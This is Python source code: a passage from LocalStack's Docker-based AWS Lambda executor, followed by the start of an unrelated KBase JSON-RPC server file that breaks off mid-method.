container_name = bootstrap.get_main_container_name()
LOG.info('Unable to get IP address of main Docker container "%s": %s' %
(container_name, e))
# return (1) predefined endpoint host, or (2) main container IP, or (3) Docker host (e.g., bridge IP)
return config.HOSTNAME_FROM_LAMBDA or DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
class InvocationResult(object):
def __init__(self, result, log_output=''):
if isinstance(result, InvocationResult):
raise Exception('Unexpected invocation result type: %s' % result)
self.result = result
self.log_output = log_output or ''
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the _execute method """
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, func_details):
# setup environment pre-defined variables for docker environment
result = func_details.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, func_details.region())
return result
def execute(self, func_arn, func_details, event, context=None, version=None,
asynchronous=False, callback=None):
def do_execute(*args):
@cloudwatched('lambda')
def _run(func_arn=None):
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, 'eventSource') == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, 'eventSourceARN')
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(sqs_queue_arn, event, e)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(result, func_arn, event, error=raised_error, dlq_sent=dlq_sent)
lambda_result_to_destination(func_details, event, result, asynchronous, raised_error)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug('Lambda executed in Event (asynchronous) mode, no response will be returned to caller')
FuncThread(do_execute).start()
return InvocationResult(None, log_output='Lambda executed asynchronously.')
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
""" This method must be overwritten by subclasses. """
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
def run_lambda_executor(self, cmd, event=None, func_details=None, env_vars={}):
kwargs = {'stdin': True, 'inherit_env': True, 'asynchronous': True}
env_vars = env_vars or {}
runtime = func_details.runtime or ''
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if func_details and is_provided and env_vars.get('DOCKER_LAMBDA_USE_STDIN') == '1':
# Note: certain "provided" runtimes (e.g., Rust programs) can block when we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
'PATH': env_vars.get('PATH') or os.environ.get('PATH', ''),
'AWS_LAMBDA_EVENT_BODY': to_str(event),
'DOCKER_LAMBDA_USE_STDIN': '1'
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop('AWS_LAMBDA_COGNITO_IDENTITY', None)
event = None
cmd = re.sub(r'(.*)(%s\s+(run|start))' % self._docker_cmd(), r'\1echo $AWS_LAMBDA_EVENT_BODY | \2', cmd)
process = run(cmd, env_vars=env_vars, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate(input=event)
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, six.string_types) and '\n' in result:
additional_logs, _, result = result.rpartition('\n')
log_output += '\n%s' % additional_logs
log_formatted = log_output.strip().replace('\n', '\n> ')
func_arn = func_details and func_details.arn()
LOG.debug('Lambda %s result / log output:\n%s\n> %s' % (func_arn, result.strip(), log_formatted))
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise InvocationException('Lambda process returned error status code: %s. Result: %s. Output:\n%s' %
(return_code, result, log_output), log_output, result)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
class ContainerInfo:
""" Contains basic information about a docker container. """
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
""" Abstract executor class for executing Lambda functions in Docker containers """
def prepare_execution(self, func_details, env_vars, command):
raise Exception('Not implemented')
def _docker_cmd(self):
""" Return the string to be used for running Docker commands. """
return config.DOCKER_CMD
def prepare_event(self, environment, event_body):
""" Return the event as a stdin string. """
# amend the environment variables for execution
environment['AWS_LAMBDA_EVENT_BODY'] = event_body
return None
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
environment = self._prepare_environment(func_details)
# configure USE_SSL in environment
if config.USE_SSL:
environment['USE_SSL'] = '1'
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
stdin = self.prepare_event(environment, event_body)
main_endpoint = get_main_endpoint_from_container()
environment['LOCALSTACK_HOSTNAME'] = main_endpoint
environment['EDGE_PORT'] = str(config.EDGE_PORT)
environment['_HANDLER'] = handler
if os.environ.get('HTTP_PROXY'):
environment['HTTP_PROXY'] = os.environ['HTTP_PROXY']
if func_details.timeout:
environment['AWS_LAMBDA_FUNCTION_TIMEOUT'] = str(func_details.timeout)
if context:
environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
environment['AWS_LAMBDA_COGNITO_IDENTITY'] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment['AWS_LAMBDA_CLIENT_CONTEXT'] = json.dumps(to_str(
base64.b64decode(to_bytes(context.client_context))))
# custom command to execute in the container
command = ''
events_file_path = ''
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
# if running a Java Lambda with our custom executor, set up classpath arguments
java_opts = Util.get_java_opts()
stdin = None
# copy executor jar into temp directory
target_file = os.path.join(lambda_cwd, os.path.basename(LAMBDA_EXECUTOR_JAR))
if not os.path.exists(target_file):
cp_r(LAMBDA_EXECUTOR_JAR, target_file)
# TODO cleanup once we have custom Java Docker image
events_file = '_lambda.events.%s.json' % short_uid()
events_file_path = os.path.join(lambda_cwd, events_file)
save_file(events_file_path, event_body)
# construct Java command
classpath = Util.get_java_classpath(target_file)
command = ("bash -c 'cd %s; java %s -cp \"%s\" \"%s\" \"%s\" \"%s\"'" %
(DOCKER_TASK_FOLDER, java_opts, classpath, LAMBDA_EXECUTOR_CLASS, handler, events_file))
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment['NODE_TLS_REJECT_UNAUTHORIZED'] = '0'
# determine the command to be executed (implemented by subclasses)
cmd = self.prepare_execution(func_details, environment, command)
# copy events file into container, if necessary
if events_file_path:
container_name = self.get_container_name(func_details.arn())
self.copy_into_container(events_file_path, container_name, DOCKER_TASK_FOLDER)
# run Lambda executor and fetch invocation result
LOG.info('Running lambda cmd: %s' % cmd)
result = self.run_lambda_executor(cmd, stdin, env_vars=environment, func_details=func_details)
# clean up events file
events_file_path and os.path.exists(events_file_path) and rm_rf(events_file_path)
# TODO: delete events file from container!
return result
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
""" Executor class for executing Lambda functions in re-usable Docker containers """
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def prepare_execution(self, func_details, env_vars, command):
func_arn = func_details.arn()
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars['_LAMBDA_SERVER_PORT'] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
container_info = self.prime_docker_container(func_details, env_vars.items(), lambda_cwd)
# Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
# passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
# available for docker exec, to better support very large Lambda events (very long environment values)
exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if not command:
command = '%s %s' % (container_info.entry_point, handler)
# determine files to be copied into the container
copy_command = ''
docker_cmd = self._docker_cmd()
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
copy_command = '%s cp "%s/." "%s:%s";' % (docker_cmd,
lambda_cwd, container_info.name, DOCKER_TASK_FOLDER)
cmd = (
'%s'
' %s exec'
' %s' # env variables
' %s' # container name
' %s' # run cmd
) % (copy_command, docker_cmd, exec_env_vars, container_info.name, command)
LOG.debug('Command for docker-reuse Lambda executor: %s' % cmd)
return cmd
def _execute(self, func_arn, *args, **kwargs):
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, func_details, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
:param runtime: Lamda runtime environment. python2.7, nodejs6.10, etc.
:param func_arn: The ARN of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = func_details.arn()
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_lambda(func_details)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
# get container startup command and run it
LOG.debug('Creating container: %s' % container_name)
cmd = self.get_container_startup_command(func_details, env_vars, lambda_cwd)
LOG.debug(cmd)
run(cmd)
if config.LAMBDA_REMOTE_DOCKER:
LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
self.copy_into_container('%s/.' % lambda_cwd, container_name, DOCKER_TASK_FOLDER)
LOG.debug('Starting container: %s' % container_name)
cmd = '%s start %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd)
# give the container some time to start up
time.sleep(1)
container_network = self.get_docker_container_network(func_arn)
entry_point = self.get_container_entrypoint(docker_image)
LOG.debug('Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network))
return ContainerInfo(container_name, entry_point)
def get_container_startup_command(self, func_details, env_vars, lambda_cwd):
docker_image = Util.docker_image_for_lambda(func_details)
rm_flag = Util.get_docker_remove_flag()
docker_cmd = self._docker_cmd()
container_name = self.get_container_name(func_details.arn())
env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
additional_flags = config.LAMBDA_DOCKER_FLAGS or ''
dns = config.LAMBDA_DOCKER_DNS
dns_str = '--dns="%s"' % dns if dns else ''
mount_volume = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if (':' in lambda_cwd and '\\' in lambda_cwd):
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volume_str = '-v "%s":%s' % (lambda_cwd_on_host, DOCKER_TASK_FOLDER) if mount_volume else ''
# Create and start the container
cmd = (
'%s create'
' %s' # --rm flag
' --name "%s"'
' --entrypoint /bin/bash' # Load bash when it starts.
' %s'
' --interactive' # Keeps the container running bash.
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
' -e EDGE_PORT="$EDGE_PORT"'
' %s' # env_vars
' %s' # network
' %s' # dns
' %s' # additional flags
' %s'
) % (docker_cmd, rm_flag, container_name, mount_volume_str,
env_vars_str, network_str, dns_str, additional_flags, docker_image)
return cmd
def get_container_entrypoint(self, docker_image):
""" Get the entry point for the given image """
docker_cmd = self._docker_cmd()
LOG.debug('Getting the entrypoint for image: %s' % (docker_image))
cmd = (
'%s image inspect'
' --format="{{ .Config.Entrypoint }}"'
' %s'
) % (docker_cmd, docker_image)
LOG.debug(cmd)
run_result = run(cmd)
entry_point = run_result.strip('[]\n\r ')
return entry_point
def copy_into_container(self, local_path, container_name, container_path):
cmd = ('%s cp %s "%s:%s"') % (self._docker_cmd(), local_path, container_name, container_path)
LOG.debug(cmd)
run(cmd)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
docker_cmd = self._docker_cmd()
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug('Stopping container: %s' % container_name)
cmd = '%s stop -t0 %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug('Removing container: %s' % container_name)
rm_docker_container(container_name, safe=True)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug('Getting all lambda containers names.')
cmd = '%s ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"' % self._docker_cmd()
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
if len(cmd_result) > 0:
container_names = cmd_result.split('\n')
else:
container_names = []
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug('Removing %d containers.' % len(container_names))
for container_name in container_names:
cmd = '%s rm -f %s' % (self._docker_cmd(), container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
# Check if the container is already running
# Note: filtering by *exact* name using regex filter '^...$' seems unstable on some
# systems. Therefore, we use a combination of filter and grep to get the results.
cmd = ("docker ps -a --filter name='%s' "
'--format "{{ .Status }} - {{ .Names }}" '
'| grep -w "%s" | cat') % (container_name, container_name)
LOG.debug('Getting status for container "%s": %s' % (container_name, cmd))
cmd_result = run(cmd)
# If the container doesn't exist. Create and start it.
container_status = cmd_result.strip()
if len(container_status) == 0:
return 0
if container_status.lower().startswith('up '):
return 1
return -1
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ''
# Get the container name.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
# Get the container network
LOG.debug('Getting container network: %s' % container_name)
cmd = (
'%s inspect %s'
' --format "{{ .HostConfig.NetworkMode }}"'
) % (docker_cmd, container_name)
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
container_network = cmd_result.strip()
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.debug('Checking if there are idle containers ...')
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment, event_body):
# Tell Lambci to use STDIN for the event
environment['DOCKER_LAMBDA_USE_STDIN'] = '1'
return event_body.encode()
def prepare_execution(self, func_details, env_vars, command):
lambda_cwd = func_details.cwd
handler = func_details.handler
entrypoint = ''
if command:
entrypoint = ' --entrypoint ""'
elif handler:
command = '"%s"' % handler
else:
command = ''
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
if network == 'host':
port = get_free_tcp_port()
env_vars['DOCKER_LAMBDA_API_PORT'] = port
env_vars['DOCKER_LAMBDA_RUNTIME_PORT'] = port
additional_flags = config.LAMBDA_DOCKER_FLAGS or ''
dns = config.LAMBDA_DOCKER_DNS
dns_str = '--dns="%s"' % dns if dns else ''
env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
debug_docker_java_port = '-p {p}:{p}'.format(p=Util.debug_java_port) if Util.debug_java_port else ''
docker_cmd = self._docker_cmd()
docker_image = Util.docker_image_for_lambda(func_details)
rm_flag = Util.get_docker_remove_flag()
# construct common flags for commands below
common_flags = ' '.join([env_vars_string, network_str, dns_str, additional_flags, rm_flag])
if config.LAMBDA_REMOTE_DOCKER:
cp_cmd = ('%s cp "%s/." "$CONTAINER_ID:%s";' % (
docker_cmd, lambda_cwd, DOCKER_TASK_FOLDER)) if lambda_cwd else ''
cmd = (
'CONTAINER_ID="$(%s create -i'
' %s' # entrypoint
' %s' # debug_docker_java_port
' %s' # common flags
' %s %s' # image and command
')";'
'%s '
'%s start -ai "$CONTAINER_ID";'
) % (docker_cmd, entrypoint, debug_docker_java_port,
common_flags, docker_image, command,
cp_cmd, docker_cmd)
else:
mount_flag = ''
if lambda_cwd:
mount_flag = '-v "%s":%s' % (Util.get_host_path_for_path_in_docker(lambda_cwd), DOCKER_TASK_FOLDER)
cmd = (
'%s run -i'
' %s'
' %s' # code mount
' %s' # common flags
' %s %s'
) % (docker_cmd, entrypoint, mount_flag, common_flags, docker_image, command)
return cmd
class LambdaExecutorLocal(LambdaExecutor):
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
environment = self._prepare_environment(func_details)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path.insert(0, '')
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
except Exception as e:
result = str(e)
sys.stderr.write('%s %s' % (e, traceback.format_exc()))
raise
finally:
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (request_id, func_arn)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ('\n' if log_output else '') + stream
log_output += '\nEND RequestId: %s' % request_id
log_output += '\nREPORT RequestId: %s Duration: %s ms' % (request_id, int((end_time - start_time) * 1000))
# store logs to CloudWatch
_store_logs(func_details, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info('Error executing Lambda "%s": %s %s' % (func_arn, error,
''.join(traceback.format_tb(error.__traceback__))))
raise InvocationException(result, log_output)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def execute_java_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
opts = config.LAMBDA_JAVA_OPTS if config.LAMBDA_JAVA_OPTS else ''
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
class_name = handler.split('::')[0]
classpath = '%s:%s:%s' % (main_file, Util.get_java_classpath(main_file), LAMBDA_EXECUTOR_JAR)
cmd = 'java %s -cp %s %s %s %s' % (opts, classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
LOG.warning(cmd)
result = self.run_lambda_executor(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ''
# Replace _debug_port_ with a random free port
if '_debug_port_' in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace('_debug_port_', ('%s' % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match('.*address=(.+:)?(\\d+).*', opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(':', '').replace('\\', '/')
if len(temp) >= 1 and temp[:1] != '/':
temp = '/' + temp
temp = '%s%s' % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_lambda(cls, func_details):
runtime = func_details.runtime or ''
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = ['dotnetcore2.0', 'dotnetcore2.1', 'python2.7', 'python3.6', 'python3.7']
if docker_image == 'lambci/lambda' and any(img in docker_tag for img in lambdas_to_add_prefix):
docker_tag = '20191117-%s' % docker_tag
if runtime == 'nodejs14.x':
# TODO temporary fix until lambci image for nodejs14.x becomes available
docker_image = 'localstack/lambda-js'
return '"%s:%s"' % (docker_image, docker_tag)
@classmethod
def get_docker_remove_flag(cls):
return '--rm' if config.LAMBDA_REMOVE_CONTAINERS else ''
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ['.']
base_dir = os.path.dirname(archive)
for pattern in ['%s/*.jar', '%s/lib/*.jar', '%s/java/lib/*.jar', '%s/*.zip']:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append('*.jar')
entries.append('java/lib/*.jar')
result = ':'.join(entries)
return result
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
'local': EXECUTOR_LOCAL,
'docker': EXECUTOR_CONTAINERS_SEPARATE,
'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
|
cnelsonAppDemoServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from cnelsonAppDemo.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'cnelsonAppDemo'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from cnelsonAppDemo.cnelsonAppDemoImpl import cnelsonAppDemo # noqa @IgnorePep8
impl_cnelsonAppDemo = cnelsonAppDemo(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
